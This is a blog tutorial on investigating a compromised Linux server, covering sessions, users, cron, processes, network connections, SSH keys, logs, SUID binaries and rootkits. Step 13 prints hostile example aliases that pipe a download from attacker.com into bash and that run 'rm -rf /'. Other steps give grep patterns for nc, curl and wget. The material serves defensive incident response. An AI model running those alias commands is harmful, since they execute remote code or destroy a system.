# How to Investigate a Compromised Linux Server



This content originally appeared on DEV Community and was authored by Farzan Afringan

🧭 Introduction

When a Linux server is compromised, every second counts. Attackers may have already opened backdoors, created hidden users, or tampered with critical files. Whether you’re a sysadmin, DevOps engineer, or a security enthusiast, knowing how to perform a basic post-breach investigation is essential. In this article, we’ll walk through practical steps to check for suspicious sessions, new users, altered files, and other indicators of compromise — all using simple shell commands.

🧑‍💻 Step 1: Check Active SSH and User Sessions

The first step after a suspected breach is identifying who is currently logged in and from where.

🔸 Check current SSH logins:

who
last -i
w

These commands help detect any suspicious or unexpected sessions — especially those from unusual IP addresses or users you don’t recognize. Look for:

  • Multiple open sessions
  • Unknown usernames
  • IP addresses outside your organization or country

🧑‍🔬 Step 2: Look for Suspicious New Users

After a breach, attackers often create hidden or non-standard user accounts to retain access.

🔸 List all users from /etc/passwd:

cut -d: -f1 /etc/passwd

The following command lists all system usernames by extracting the first field from /etc/passwd.

Look for:

  • Usernames that don’t follow your system’s naming convention

  • Recently added accounts

  • Accounts with login shells like /bin/bash (vs. /sbin/nologin or /usr/sbin/nologin)

You can also sort users by creation time (if your distro tracks /home timestamps):

ls -lt /home

🕵‍♂ Step 3: Identify Recently Modified or Suspicious Files

After gaining access, attackers often modify configuration files, upload malware, or leave behind backdoors. Checking for recently changed files can reveal important clues.

🔸 Find recently modified files:

find /etc -type f -mtime -5 2>/dev/null

This command lists all regular files in /etc that were modified in the last 5 days. You can change -5 to any number of days depending on when you suspect the compromise occurred.

You can also check for recently modified files system-wide:

find / -type f -mtime -5 -ls 2>/dev/null

🔸 Look for:

  • Modifications to SSH config: /etc/ssh/sshd_config

  • Unexpected cron jobs: /etc/cron*

  • Backdoors in bash/profile scripts: .bashrc, .bash_profile, /etc/profile, etc.

  • Files with strange names or locations like /tmp/.xyz, /var/tmp/.abc, or /dev/shm/shell

🔒 Step 4: Check for Unauthorized Scheduled Tasks

🔸 Check system-wide cron jobs:

cat /etc/crontab
ls -l /etc/cron.*

🔸 Check user-specific cron jobs:

for user in $(cut -f1 -d: /etc/passwd); do
  crontab -l -u $user 2>/dev/null
done

🧠 Step 5: Analyze Running Processes for Anomalies

After a breach, attackers often run hidden or suspicious processes to maintain persistence. Investigating running processes can reveal malware, reverse shells, or rogue services.

🔸 List all active processes:

ps auxf

🔸 Sort processes by start time to catch recent entries:

ps -eo pid,ppid,user,args --sort=start_time

Look for:

  • Processes running from unusual directories like /tmp, /dev/shm, or /var

  • Legitimate-looking names (e.g., apache, kworker, cron) running from shady paths

  • Processes owned by regular users but performing high-privilege tasks

  • Long-running shell or Python processes without an obvious purpose

🌐 Step 6: Inspect Network Connections and Open Ports

A compromised server often has active connections to attacker-controlled hosts or is listening on unexpected ports. Monitoring network activity is crucial for spotting data exfiltration, reverse shells, or backdoors.

🔸 Show all active network connections:

ss -tulnp

Or, if ss isn’t available:

netstat -tulnp

🔸 Check for established outbound connections:

ss -tanp | grep ESTABLISHED

Look for:

  • Listening services on high or uncommon ports

  • Processes listening on 0.0.0.0 (all interfaces) unexpectedly

  • Connections to unfamiliar IPs, especially on ports like 4444, 8080, 1337, or other non-standard ports

  • Reverse shell patterns (e.g., an outbound connection from a shell binary)

🕵‍♂ Step 7: Inspect Shell Initialization Files and Aliases

Attackers often leave behind persistent access via bash aliases, modified shell initialization files, or backdoors hidden in commonly loaded scripts. These files are executed automatically when a user logs in, making them a perfect place for stealthy payloads.

🔸 Check .bashrc, .bash_profile, and .profile for suspicious entries:

grep -E 'alias|nc|wget|curl|python|sh|bash' /home/*/.bashrc /home/*/.bash_profile /home/*/.profile 2>/dev/null

🔸 Also check system-wide equivalents:

grep -E 'alias|nc|wget|curl|python|sh|bash' /etc/bash.bashrc /etc/profile 2>/dev/null

Look for:

  • Aliases that override standard commands (e.g., alias ls=’rm -rf /’)

  • Calls to nc, curl, wget, python, bash, or remote URLs

  • Obfuscated or base64-encoded commands

  • Auto-executed reverse shells or unknown binaries

🧪 Step 7: Examine Shell Startup Files for Persistent Backdoors

Attackers often leave persistence mechanisms by modifying shell startup scripts. These can execute malicious payloads whenever a user logs in or opens a shell.

cat /etc/profile
cat /etc/bash.bashrc

🔸 Check user dotfiles:

cat ~/.bashrc
cat ~/.bash_profile
cat ~/.profile

Look for:

  • Aliases that override commands (e.g., alias ls=’rm -rf /’)

  • Suspicious curl, wget, nc, bash, or Python commands

  • Unusual environment variables or PATH modifications

  • Base64-encoded blobs or obfuscated scripts

Tip: Use grep to find common keywords:

grep -E 'curl|wget|nc|bash|python|base64' ~/.bashrc

🧑‍🔧 Step 8: Check for Unauthorized Root or Sudo Users

Attackers often add themselves to privileged groups like sudo or wheel to maintain full control over the system. It’s critical to identify all users with elevated permissions.

🔸 List users in the sudo group:

getent group sudo

On RHEL / AlmaLinux / CentOS systems, use:

getent group wheel

You should also check for accounts with UID 0, which indicates root-level access:

awk -F: '$3 == 0 { print $1 }' /etc/passwd

🔍 Watch out for:

  • Unknown usernames in sudo or wheel groups

  • Multiple accounts with UID 0

  • Suspicious or generic-looking usernames with elevated privileges

  • If you find any unfamiliar entries, investigate immediately — especially
    if they were created recently.

📜 Step 9: Analyze Log Files for Signs of Intrusion

System log files are one of the most important sources of evidence when investigating a compromised Linux server. They can help you track login attempts, sudo activity, privilege escalation, and other unauthorized actions.

# For authentication attempts and sudo usage
cat /var/log/auth.log        # Debian/Ubuntu
cat /var/log/secure          # RHEL/CentOS/AlmaLinux

# General system messages (including kernel & service errors)
cat /var/log/messages

# SSH activity
grep sshd /var/log/auth.log  # or /var/log/secure

# Recent logins with sudo
grep 'sudo' /var/log/auth.log

🔍 Look for:

  • Multiple failed login attempts (brute force patterns)

  • Logins from unexpected IP addresses or at unusual times

  • Unrecognized use of sudo or su

  • Commands run with elevated privileges

  • Creation of new users or modification of existing ones

  • Signs of tampering (e.g., log cleared, log rotated suspiciously)

💡 Tip: You can use less, grep, or journalctl for better searching:

journalctl -xe
grep -i 'failed\|invalid\|error' /var/log/auth.log

🔐 Step 10: Inspect SSH Keys and Remote Access Configurations

After a compromise, attackers often install their own SSH keys to maintain silent, passwordless access even if you change user passwords. It’s crucial to audit your SSH key configurations.

🔸 Check for unfamiliar or suspicious SSH keys:

cat ~/.ssh/authorized_keys

Also review other users’ SSH keys:

find /home -type f -name "authorized_keys" -exec cat {} \; 2>/dev/null

Check for:

  • Long unfamiliar key strings

  • Keys added recently (check file modification date: ls -l ~/.ssh/authorized_keys)

  • Multiple keys for users who shouldn’t have remote access

🔸 Inspect system-wide SSH configuration:

cat /etc/ssh/sshd_config

Look for:

  • PermitRootLogin yes → 🚨 risky if enabled

  • PasswordAuthentication yes → 🚨 allows brute-force attacks

  • AuthorizedKeysFile → ensure it’s not pointing to suspicious locations

  • AllowUsers or DenyUsers → check for unexpected entries

💡 Tip: Also check for hidden .ssh folders:

find /home -type d -name ".ssh" -ls 2>/dev/null

🧰 Step 11: Audit Installed Tools and Potentially Abused Binaries

Attackers often rely on common Linux tools like curl, wget, python, or netcat (nc) for downloading payloads, creating reverse shells, or exfiltrating data. It’s important to ensure these tools haven’t been replaced or abused.

🔸 Check for suspicious binaries or modifications:

which curl wget nc python bash

Then verify their integrity (Debian/Ubuntu example):

dpkg -V curl wget netcat python3 bash

On RHEL/AlmaLinux/CentOS:

rpm -V curl wget nmap nc python3 bash

Look for:

  • Unexpected file changes

  • Binaries with altered sizes or checksums

  • Replaced tools located in suspicious paths like /tmp, /dev/shm, /home/user/.local/bin

🔸 Search for alternative tools or renamed backdoors:

find / -type f -perm -111 -exec file {} \; 2>/dev/null | grep -i "elf"

This helps locate all executable binaries across the system, useful to catch renamed tools or binaries dropped by attackers.

💡 Tip: Pay special attention to:

  • Binaries in /usr/local/bin, /tmp, or /home/*/.local/bin

  • Custom versions of known tools like python, nc, or bash

  • Hidden files starting with . (e.g., .bash, .curl)

📜 Step 12: Review System Logs for Signs of Intrusion

System logs are one of the most valuable sources for understanding what happened before, during, and after a compromise. Reviewing these logs can reveal unauthorized login attempts, privilege escalation, command histories, and more.

🔸 Check authentication logs:

On Debian/Ubuntu:

less /var/log/auth.log

On RHEL/AlmaLinux/CentOS:

less /var/log/secure

Look for:

  • Failed or unusual login attempts

  • Successful root logins (session opened for user root)

  • Sudden group membership changes (e.g., added to sudoers)

🔸 Check system reboots and shutdowns:

last reboot
last shutdown

Unscheduled reboots or shutdowns may signal that an attacker rebooted the system after making changes.

🔸 Review sudo usage:

grep 'sudo:' /var/log/auth.log

Or:

grep 'sudo:' /var/log/secure

Look for:

  • Suspicious sudo commands

  • Privilege escalation by unknown or unauthorized users

🔸 Check for suspicious logins from unknown IPs:

last -i | grep -v 'your-known-ip-or-subnet'

💡 Tip: Focus on events close to the suspected breach time — sudden login spikes, unexpected root access, or new user creation around that time are all red flags.

🧩 Step 13: Check for Aliases and Function Overrides (Command Hijacking)

One sneaky trick attackers use is command hijacking — redefining commonly used commands with malicious alternatives via shell aliases or functions. These overrides are often invisible unless you explicitly check for them.

alias
alias ls='rm -rf /'
alias cat='curl attacker.com | bash'

Or any alias pointing to remote scripts or unknown binaries.

🔸 List all shell functions (may override real commands):

declare -f

This shows all function definitions in the current shell. Look for:

Functions named after common commands (ls, cat, ps, whoami)

Any suspicious content in those functions, such as base64, curl, nc, or reverse shell payloads

🔸 Check system-wide aliases:

grep alias /etc/bash.bashrc /etc/profile 2>/dev/null

Or:

grep -E 'alias|function' /etc/*rc /etc/profile 2>/dev/null

🛡 If you find any overrides, especially for commonly used commands, remove or comment them out immediately and investigate further.

🌍 Step 14: Inspect User Environment Variables and PATH Manipulation

Attackers sometimes modify environment variables to alter system behavior or hide malicious activity. The most common targets are:

  • PATH — to hijack command resolution

  • LD_PRELOAD, LD_LIBRARY_PATH — for injecting malicious libraries

  • PS1 — to spoof shell prompts and trick admins

env

Pay attention to:

PATH containing suspicious directories like /tmp, /dev/shm, or unknown entries at the beginning (attackers may place their binaries there to override real commands)

LD_PRELOAD or LD_LIBRARY_PATH — these should be empty or unset unless specifically configured

🔸 Check for .bashrc or .profile modifications:

grep PATH ~/.bashrc ~/.profile

Look for malicious prepending like:

export PATH="/tmp/bin:$PATH"

Or:

🔸 Check for PS1 spoofing (fake prompt):

echo $PS1

A normal PS1 might look like:

[\u@\h \W]\$

But a spoofed one could hide user/root identity, current directory, or other cues.

🛡 If any of these look suspicious, investigate the corresponding file (like .bashrc, .profile, etc.) and sanitize it.

🧾 Step 15: Review Command History for Suspicious Activity

Shell history files can be a goldmine during post-breach analysis — especially if the attacker wasn’t careful or didn’t wipe them.

🔸 Check the current user’s history:

cat ~/.bash_history

🔸 Check history files for all users:

find /home -name ".*_history" -exec ls -l {} \;

To inspect the contents:

find /home -name ".*_history" -exec cat {} \; 2>/dev/null

🔍 Look for:

  • Usage of tools like nc, curl, wget, python, bash

  • Cleanup commands like history -c or unset HISTFILE

  • Installation of suspicious packages or SSH config changes

  • File permission modifications (e.g., chmod 777, chattr)

Downloading or executing unknown scripts

💡 Tip: If you see that the history file is empty or missing, it could be a sign that the attacker tried to cover their tracks.

🧯 Step 16: Detect Log Wiping or Tampering

One of the first things a smart attacker does is cover their tracks by wiping or manipulating log files. Detecting this tampering can confirm a breach and help you estimate its timeline.

🔸 Look for unusually small or recently emptied log files:

ls -l /var/log | sort -k5 -n

This sorts logs by size. Be suspicious of logs like auth.log, secure, or messages that are abnormally small or have been modified recently.

🔸 Check file modification times:

stat /var/log/auth.log
stat /var/log/secure

Look at the Modify and Change timestamps — a sudden update without corresponding activity inside the file may suggest wiping.

🔸 Check logrotate activity:

cat /etc/logrotate.conf
ls -l /etc/logrotate.d/

If logs were rotated right before or after suspicious activity, check backups or older rotated files:

ls -l /var/log/*.gz
zcat /var/log/auth.log.1.gz | grep 'ssh'

🔍 Watch out for:

  • Log files with suspiciously recent timestamps

  • Sudden drops in log size

  • Missing or empty logs (auth.log, secure, messages, bash_history)

  • Logs ending in the middle of a session (incomplete entries)

🧬 Step 17: Investigate Kernel-Level Rootkits

Rootkits are stealthy tools attackers use to hide their presence, intercept system calls, and bypass detection mechanisms. Kernel-level rootkits are especially dangerous because they can modify how the system behaves at a low level.

🔸 Check for known rootkits with chkrootkit:

sudo apt install chkrootkit   # Debian/Ubuntu
sudo chkrootkit

Or on RHEL/CentOS:

sudo yum install chkrootkit
sudo chkrootkit

🔸 Use rkhunter (Rootkit Hunter):

sudo apt install rkhunter
sudo rkhunter --update
sudo rkhunter --check

🔍 These tools check for:

  • Known rootkit signatures

  • Unexpected binaries in system paths

  • Hidden processes or network ports

  • Modified kernel modules

🔸 Manually inspect loaded kernel modules:

lsmod

Compare against a baseline if you have one. Look for unfamiliar or oddly named modules.

🔸 Check for hidden ports or kernel hooks (advanced):

netstat -ntulp   # Already covered — compare again here
dmesg | grep -i hook

⚠ Red Flags:

  • Detection of known rootkits (RH-Sharpe, Adore, Knark, etc.)

  • Kernel modules you don’t recognize

  • Logs showing unexpected loading/unloading of modules

  • If rootkits are detected, it’s safer to reinstall the OS and restore from a known clean backup.

⏰ Step 18: Monitor Suspicious One-Time or Scheduled Tasks via at and systemd timers

While cron jobs are a common place to check for persistence, attackers may also leverage lesser-known scheduling mechanisms like at jobs and systemd timers to execute malicious scripts at specific times — often escaping notice.

🔸 Check for pending at jobs:

atq

This lists one-time scheduled jobs for the current user. If you see anything suspicious:

atrm <job-number>

This removes the scheduled job before it runs.

🔸 List all active and inactive systemd timers:

systemctl list-timers --all
  • This shows systemd timers and their associated services.

  • Pay attention to:

  • Timers with odd names or generic ones like backup.timer, sync.timer

  • Timers pointing to unknown or untracked scripts (e.g., in /tmp/, /var/tmp/, /dev/shm/)

🔸 Investigate a suspicious timer:

systemctl cat <timer-name>

Then inspect its related service:

systemctl cat <service-name>

🕵‍♂ Red Flags:

  • Timers triggering scripts in non-standard directories

  • Recently added timers with unclear purposes

  • Timers set to execute shortly after boot or at unusual times

  • at jobs queued without documentation or known reason

🧱 Step 19: Scan for Unauthorized SetUID and SetGID Binaries

Attackers often exploit SetUID (SUID) and SetGID (SGID) binaries to escalate privileges or maintain persistent access. These special permissions allow a program to run with the privileges of the file owner or group — even if the user executing it doesn’t have those rights.

🔸 Find all SetUID binaries (run as root even by normal users):

find / -perm -4000 -type f 2>/dev/null

This command searches the entire system for files with the SetUID bit (4000) set.

🔸 Find all SetGID binaries (run with group privileges):

find / -perm -2000 -type f 2>/dev/null

Look carefully for:

  • Binaries not normally present on your system

  • Scripts or binaries in unusual directories like /tmp, /dev/shm, /var/tmp, or user home directories

  • Files with recent modification timestamps

🔍 Red Flags:

  • Custom binaries with SetUID in non-system paths

  • Known binaries that have been tampered with

  • Tools like nmap, perl, python, find, or cp with unexpected SetUID bits (which can be used for privilege escalation)

  • Binaries that shouldn’t be SUID at all (check against your distro’s baseline)

🛡 Tip:
To compare your system against a known-safe baseline, you can install a package integrity tool like debsums (Debian/Ubuntu) or use rpm -V (RHEL-based distros) to verify file changes.

🕳 Step 20: Investigate Hidden Files and Directories

Attackers commonly use hidden files and directories (those starting with a dot .) to store malicious payloads, backdoors, or staging tools in a way that avoids detection during casual inspection.

🔸 Search for hidden files and directories in home paths:

find /home -name ".*" -type f -ls 2>/dev/null
find /home -name ".*" -type d -ls 2>/dev/null

🔸 Search system-wide for hidden files (excluding standard paths):

find / -type f -name ".*" ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" 2>/dev/null

🔍 What to look for:

  • Unusual filenames like .xyz, .config.old, .update, .bash_history.bak

  • Hidden files inside /tmp, /dev/shm, /var/tmp, or user home directories

  • Files with obfuscated or binary content

  • Files with recent modification times, especially if they weren’t there before the compromise

🔸 List all hidden files and folders in /tmp, /var/tmp, and /dev/shm:

ls -la /tmp | grep "^\."
ls -la /dev/shm | grep "^\."
ls -la /var/tmp | grep "^\."

🛡 Tip:
Hidden files in locations like /root, /home/user/.cache, or .ssh/ may contain malware, reverse shell scripts, or malicious SSH keys.

If you’re unsure about a file, run file and strings on it:

file /tmp/.suspicious
strings /tmp/.suspicious | less

✅ Conclusion

Investigating a compromised Linux server requires a careful, methodical approach — and speed matters. The 20 steps we covered here give you a solid foundation to detect suspicious activity, identify persistence mechanisms, and regain control of your system.

Stay vigilant, automate wherever possible, and always log your findings.

📌 In the next article, we’ll explore deeper topics like rootkits, log correlation, digital forensics tools, and how to properly rebuild or harden a server post-breach.

Feel free to share your thoughts or tools you use in your own investigations!

🔗 Let’s Connect

If you found this article useful or have questions, feel free to reach out or follow me:

Stay tuned — more security and Linux content coming soon!


This content originally appeared on DEV Community and was authored by Farzan Afringan